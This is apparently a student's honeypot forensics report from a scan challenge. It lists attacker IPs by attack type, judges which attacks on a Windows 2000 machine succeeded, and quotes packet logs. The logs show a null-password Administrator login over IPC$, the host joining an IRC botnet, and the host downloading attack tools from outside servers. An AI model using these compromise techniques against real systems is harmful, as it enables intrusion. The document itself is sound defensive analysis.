W32.HLLW.Deloder Worm: 61.111.101.78
Code Red Worm:
Retina
CodeRed Scanner: 68.169.174.108
Code Red Worm: 218.25.147.83
Other IIS Buffer Overflows:
24.197.194.106
210.22.204.101
Directory Traversing Vulnerability:
24.197.194.106
FX-Scanner:
Accessed FTP: 141.85.37.78 and 203.170.177
Accessed port 57 and HTTP: 192.130.71.66 and 213.23.49.158
DameWare Remote Control Agent Vulnerability
210.22.204.101
Microsoft SQL Server Vulnerability
12.252.61.161
12.253.142.87
12.83.147.97
168.243.103.205
192.215.160.106
194.199.201.9
200.135.228.10
200.50.124.2
205.180.159.35
206.149.148.192
210.111.56.66
212.122.20.74
212.162.165.18
213.122.77.74
213.170.56.83
216.192.145.21
216.229.73.11
217.35.65.9
218.244.66.32
218.4.48.74
218.4.65.115
218.4.87.137
218.4.99.237
218.92.13.142
219.145.211.132
219.145.211.3
24.167.221.106
24.74.199.104
4.33.244.44
61.132.88.50
61.132.88.90
61.134.45.19
61.150.120.72
61.150.72.7
61.177.56.98
61.177.62.66
61.185.212.166
61.185.215.42
61.185.242.190
61.185.29.9
61.203.104.148
61.8.1.64
66.233.4.225
66.81.131.17
67.201.75.38
67.81.161.166
68.37.54.69
68.45.123.130
68.84.210.227
81.57.217.208
rpc.statd Vulnerability
204.50.186.37
212.243.23.179
Hack´a´Tack
62.150.170.134
62.150.170.232
SOCKS Vulnerability
200.74.26.73
3. Which attacks
were successful?
Those attackers that attempted to map the C drive through port 137 were unsuccessful.
8 0.514274 219.118.31.42 172.16.134.191 SMB Tree Connect AndX Request, Path: \\PC0191\C
9 0.517180 172.16.134.191 219.118.31.42 TCP netbios-ssn > 2388 [RST] Seq=2476847245 Ack=1943715703 Win=0 Len=0
In packet #9, the honeypot returned the [RST] bit (RESET) which means that it could not establish a connection. This would have worked on an older version of Windows. However, in Windows 2000, the attacker has to log onto the IPC$ share instead like this:
925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\172.16.134.191\IPC$
294 236849.783405 172.16.134.191 195.36.247.77 SMB Tree Connect AndX Response
All
the attackers that logged into the honeypot through the IPC$ share were
successful. They logged in to the
Administrator account using the NULL password.
W32.HLLW.Deloder
Worm
61.111.101.78
succeeded in exploiting the honeypot with the Deloder Worm. As I described in the Vulnerabilities
section, the worm logged in through the IPC$ share and installed the
PSEXESVC.EXE and INST.EXE files. Right
after 61.111.101.78 finished communicating with the honeypot, the honeypot
began attempting to log on to the IRC servers like so:
34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0
35739 412630.079021 172.16.134.191 66.33.65.58 TCP 1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0
35745 413286.204510 172.16.134.191 63.241.174.144 TCP 1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0
35762 413307.053048 172.16.134.191 217.199.175.10 TCP 1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0
This
tells us that 61.111.101.78 successfully exploited the honeypot and executed
commands on the honeypot telling it to log on to an IRC Server and await
commands. The honey pot succeeded in
logging in to the IRC Server 209.196.44.172. This IRC chatroom is a botnet that interacted with at least 6639
distinct hosts while the honeypot was logged in. A little while after the honeypot logged into the botnet, it
received an order to send the following packets:
39390 418489.571532 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39394 418492.509669 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39397 418498.652595 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
These
packets were an attack on 199.107.7.2.
They were sent to TCP port 31337 which is the port that Back
Orifice
and a number of other Trojans run on. However
the honeypot received no response from 199.107.7.2.
Code
Red Worm
After
218.25.147.83 launched the Code Red attack on the honeypot, it no longer
interacted with the honeypot. Since the
honeypot did not proceed to send the Code Red virus to other machines, I am
assuming that the attack was unsuccessful.
Other
IIS Buffer Overflows
24.197.194.106
attempted a buffer overflow similar to the one described in the Vulnerabilities
section. However, it was unable to
exploit the honeypot.
It
appears that the buffer overflow attempted by 210.22.204.101 was
successful. Right after the buffer
overflow, 210.22.204.101 was able to successfully connect with the honeypot on
TCP port 4899 which is the Remote Administrator port. The Remote Administrator is used to control a computer
remotely. It is often used by technical
support staff to assist someone in fixing their computer. 210.22.204.101 uses the Remote Administrator
to surf the internet in search of two tools: ZipCentral (zcsetup.exe) and
FoundStone Fport (fport.zip). The
ZipCentral program is presumably used to unzip the Fport program. Fport is a legitimate utility used to
identify unknown open ports. The files
requests appear below:
18726 332245.693463 172.16.134.191 217.151.192.231 HTTP GET /users/z/zcentral/zcsetup.exe HTTP/1.1
20815 335390.704047 172.16.134.191 216.154.242.126 HTTP GET /knowledge/zips/fport.zip HTTP/1.1
The
attacker successfully downloads the files.
Most likely, the attacker plans on using the honeypot to scan other
computers and attack them at a later date.
He has probably left a backdoor on the honeypot.
Directory
Traversing Vulnerability
24.197.194.106
attempted to exploit the honeypot’s IIS using directory traversing. There is no reason to believe that it
succeeded.
FX-Scanner
The
scans were successful, but the honeypot was not harmed.
DameWare
Remote Control Agent Vulnerability
DameWare
Remote Control Agent was not running on the honeypot and port 6129 was not open
so an attack was unsuccessful.
Microsoft
SQL Server Vulnerability
Microsoft
SQL Server was not running on the honeypot and port 1434 was not open so an
attack was unsuccessful.
rpc.statd
Vulnerability
Microsoft
SQL Server was not running on the honeypot and port 111 was not open so an
attack was unsuccessful.
Hack´a´Tack
The
Hack´a´Tack was unsuccessful.
SOCKS
Vulnerability
SOCKS
was not running on the honeypot and port 1080 was not open so an attack was
unsuccessful.
1. What did you learn about analysis as a result
of studying this scan?
I learned how to use Ethereal and Snort for the first time. I discovered how many different attacks are out there and how vulnerable Windows 2000 is. My fundamental understanding of packet-based networking has improved.
2. How do you anticipate being able to apply
your new knowledge and skills?
First of all, I will update my own Windows 2000 system. I feel that upon graduating from college, I will be able to put these new skills to use in my profession.
3. How can we improve the SotM challenge? What
would you like to see added? What would you like to see done differently?
No
complaints.
Sources
and Useful Links:
A
Short IRC Primer: http://www.irchelp.org/irchelp/ircprimer.html
Just
What is a Botnet? http://zine.dal.net/previousissues/issue22/botnet.php
Ports
List:
http://www.neohapsis.com/neolabs/neo-ports/neo-ports.html
Buffer
Overflow in IIS info: http://www.eeye.com/html/Research/Advisories/AD20010618.html
Deloder
Worm Analysis: http://www.klcconsulting.net/deloder_worm.htm
Input
Validation Problem in rpc.statd: http://www.cert.org/advisories/CA-2000-17.html
Firewall
Forensics: http://www.robertgraham.com/pubs/firewall-seen.html
"Code
Red" Worm Exploiting Buffer Overflow In IIS: http://www.cert.org/advisories/CA-2001-19.html
TCP
6129 ? Dameware:
http://lists.insecure.org/lists/incidents/2002/Aug/0107.html